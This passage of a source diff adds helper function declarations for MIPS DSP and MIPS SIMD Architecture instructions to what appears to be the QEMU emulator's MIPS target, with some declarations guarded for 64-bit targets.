+ tl, i32, tl, tl) +DEF_HELPER_FLAGS_2(precrq_ph_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(precrq_rs_ph_w, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_2(precr_ob_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(precr_sra_qh_pw, + TCG_CALL_NO_RWG_SE, tl, tl, tl, i32) +DEF_HELPER_FLAGS_3(precr_sra_r_qh_pw, + TCG_CALL_NO_RWG_SE, tl, tl, tl, i32) +DEF_HELPER_FLAGS_2(precrq_ob_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(precrq_qh_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) 
+DEF_HELPER_FLAGS_3(precrq_rs_qh_pw, + TCG_CALL_NO_RWG_SE, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(precrq_pw_l, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#endif +DEF_HELPER_FLAGS_3(precrqu_s_qb_ph, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(precrqu_s_ob_qh, + TCG_CALL_NO_RWG_SE, tl, tl, tl, env) + +DEF_HELPER_FLAGS_1(preceq_pw_qhl, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceq_pw_qhr, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceq_pw_qhla, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceq_pw_qhra, TCG_CALL_NO_RWG_SE, tl, tl) +#endif +DEF_HELPER_FLAGS_1(precequ_ph_qbl, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(precequ_ph_qbr, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(precequ_ph_qbla, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(precequ_ph_qbra, TCG_CALL_NO_RWG_SE, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_1(precequ_qh_obl, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(precequ_qh_obr, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(precequ_qh_obla, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(precequ_qh_obra, TCG_CALL_NO_RWG_SE, tl, tl) +#endif +DEF_HELPER_FLAGS_1(preceu_ph_qbl, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceu_ph_qbr, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceu_ph_qbla, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceu_ph_qbra, TCG_CALL_NO_RWG_SE, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_1(preceu_qh_obl, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceu_qh_obr, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceu_qh_obla, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceu_qh_obra, TCG_CALL_NO_RWG_SE, tl, tl) +#endif + +/* DSP GPR-Based Shift Sub-class insns */ +DEF_HELPER_FLAGS_3(shll_qb, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(shll_ob, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(shll_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(shll_s_ph, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) 
+DEF_HELPER_FLAGS_3(shll_qh, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(shll_s_qh, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(shll_s_w, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(shll_pw, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(shll_s_pw, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_2(shrl_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shrl_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_2(shrl_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shrl_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#endif +DEF_HELPER_FLAGS_2(shra_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_r_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_2(shra_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_r_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#endif +DEF_HELPER_FLAGS_2(shra_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_r_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_r_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_2(shra_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_r_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_r_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#endif + +/* DSP Multiply Sub-class insns */ +DEF_HELPER_FLAGS_3(muleu_s_ph_qbl, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(muleu_s_ph_qbr, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(muleu_s_qh_obl, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(muleu_s_qh_obr, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(mulq_rs_ph, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(mulq_rs_qh, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(muleq_s_w_phl, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(muleq_s_w_phr, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(muleq_s_pw_qhl, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(muleq_s_pw_qhr, 0, 
tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_4(dpau_h_qbl, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dpau_h_qbr, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpau_h_obl, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(dpau_h_obr, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpsu_h_qbl, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dpsu_h_qbr, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpsu_h_obl, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(dpsu_h_obr, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpa_w_ph, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpa_w_qh, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpax_w_ph, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dpaq_s_w_ph, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpaq_s_w_qh, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpaqx_s_w_ph, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dpaqx_sa_w_ph, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dps_w_ph, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dps_w_qh, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpsx_w_ph, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dpsq_s_w_ph, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpsq_s_w_qh, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpsqx_s_w_ph, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dpsqx_sa_w_ph, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(mulsaq_s_w_ph, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(mulsaq_s_w_qh, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpaq_sa_l_w, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpaq_sa_l_pw, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpsq_sa_l_w, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpsq_sa_l_pw, 0, void, tl, tl, 
i32, env) +DEF_HELPER_FLAGS_4(mulsaq_s_l_pw, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(maq_s_w_phl, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(maq_s_w_phr, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(maq_sa_w_phl, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(maq_sa_w_phr, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_3(mul_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(mul_s_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(mulq_s_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(mulq_s_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(mulq_rs_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_4(mulsa_w_ph, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(maq_s_w_qhll, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_s_w_qhlr, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_s_w_qhrl, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_s_w_qhrr, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_sa_w_qhll, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_sa_w_qhlr, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_sa_w_qhrl, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_sa_w_qhrr, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_s_l_pwl, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_s_l_pwr, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(dmadd, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(dmaddu, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(dmsub, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(dmsubu, 0, void, tl, tl, i32, env) +#endif + +/* DSP Bit/Manipulation Sub-class insns */ +DEF_HELPER_FLAGS_1(bitrev, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_3(insv, 0, tl, env, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(dinsv, 0, tl, env, tl, tl) +#endif + +/* DSP Compare-Pick Sub-class insns */ +DEF_HELPER_FLAGS_3(cmpu_eq_qb, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpu_lt_qb, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpu_le_qb, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_2(cmpgu_eq_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) 
+DEF_HELPER_FLAGS_2(cmpgu_lt_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(cmpgu_le_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(cmp_eq_ph, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_lt_ph, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_le_ph, 0, void, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(cmpu_eq_ob, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpu_lt_ob, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpu_le_ob, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpgdu_eq_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpgdu_lt_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpgdu_le_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(cmpgu_eq_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(cmpgu_lt_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(cmpgu_le_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(cmp_eq_qh, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_lt_qh, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_le_qh, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_eq_pw, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_lt_pw, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_le_pw, 0, void, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(pick_qb, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(pick_ph, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(pick_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(pick_qh, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(pick_pw, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_2(packrl_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_2(packrl_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#endif + +/* DSP Accumulator and DSPControl Access Sub-class insns */ +DEF_HELPER_FLAGS_3(extr_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(extr_r_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(extr_rs_w, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(dextr_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(dextr_r_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(dextr_rs_w, 0, tl, tl, tl, env) 
+DEF_HELPER_FLAGS_3(dextr_l, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(dextr_r_l, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(dextr_rs_l, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(extr_s_h, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(dextr_s_h, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(extp, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(extpdp, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(dextp, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(dextpdp, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(shilo, 0, void, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(dshilo, 0, void, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(mthlip, 0, void, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(dmthlip, 0, void, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(wrdsp, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_2(rddsp, 0, tl, tl, env) + +/* MIPS SIMD Architecture */ +DEF_HELPER_4(msa_andi_b, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ori_b, void, env, i32, i32, i32) +DEF_HELPER_4(msa_nori_b, void, env, i32, i32, i32) +DEF_HELPER_4(msa_xori_b, void, env, i32, i32, i32) +DEF_HELPER_4(msa_bmnzi_b, void, env, i32, i32, i32) +DEF_HELPER_4(msa_bmzi_b, void, env, i32, i32, i32) +DEF_HELPER_4(msa_bseli_b, void, env, i32, i32, i32) +DEF_HELPER_5(msa_shf_df, void, env, i32, i32, i32, i32) + +DEF_HELPER_5(msa_addvi_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_subvi_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_maxi_s_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_maxi_u_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_mini_s_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_mini_u_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_ceqi_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_clti_s_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_clti_u_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_clei_s_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_clei_u_df, void, env, i32, i32, i32, s32) 
+DEF_HELPER_4(msa_ldi_df, void, env, i32, i32, s32) + +DEF_HELPER_5(msa_slli_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srai_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srli_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_bclri_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_bseti_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_bnegi_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_binsli_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_binsri_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_sat_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_sat_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srari_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srlri_df, void, env, i32, i32, i32, i32) + +DEF_HELPER_5(msa_sll_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_sra_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srl_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_bclr_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_bset_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_bneg_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_binsl_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_binsr_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_addv_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_subv_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_max_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_max_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_min_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_min_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_max_a_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_min_a_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ceq_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_clt_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_clt_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_cle_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_cle_u_df, void, env, i32, i32, i32, i32) 
+DEF_HELPER_5(msa_add_a_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_adds_a_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_adds_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_adds_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ave_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ave_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_aver_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_aver_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_subs_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_subs_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_subsus_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_subsuu_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_asub_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_asub_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_mulv_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_maddv_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_msubv_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_div_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_div_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_mod_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_mod_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_dotp_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_dotp_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_dpadd_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_dpadd_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_dpsub_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_dpsub_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_sld_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_splat_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_pckev_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_pckod_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ilvl_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ilvr_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ilvev_df, 
void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ilvod_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_vshf_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srar_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srlr_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_hadd_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_hadd_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_hsub_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_hsub_u_df, void, env, i32, i32, i32, i32) + +DEF_HELPER_5(msa_sldi_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_splati_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_copy_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_copy_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_insert_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_insve_df, void, env, i32, i32, i32, i32) +DEF_HELPER_3(msa_ctcmsa, void, env, tl, i32) +DEF_HELPER_2(msa_cfcmsa, tl, env, i32) +DEF_HELPER_3(msa_move_v, void, env, i32, i32) + +DEF_HELPER_5(msa_fcaf_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcun_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fceq_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcueq_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fclt_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcult_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcle_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcule_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsaf_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsun_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fseq_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsueq_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fslt_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsult_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsle_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsule_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fadd_df, void, env, i32, i32, i32, i32) 
+DEF_HELPER_5(msa_fsub_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmul_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fdiv_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmadd_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmsub_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fexp2_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fexdo_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ftq_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmin_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmin_a_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmax_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmax_a_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcor_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcune_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcne_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_mul_q_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_madd_q_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_msub_q_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsor_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsune_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsne_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_mulr_q_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_maddr_q_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_msubr_q_df, void, env, i32, i32, i32, i32) + +DEF_HELPER_4(msa_and_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_or_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_nor_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_xor_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_bmnz_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_bmz_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_bsel_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_fill_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_pcnt_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_nloc_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_nlzc_df, void, env, i32, i32, i32) + 
+DEF_HELPER_4(msa_fclass_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ftrunc_s_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ftrunc_u_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_fsqrt_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_frsqrt_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_frcp_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_frint_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_flog2_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_fexupl_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_fexupr_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ffql_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ffqr_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ftint_s_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ftint_u_df, void, env, i32, i32, i32) 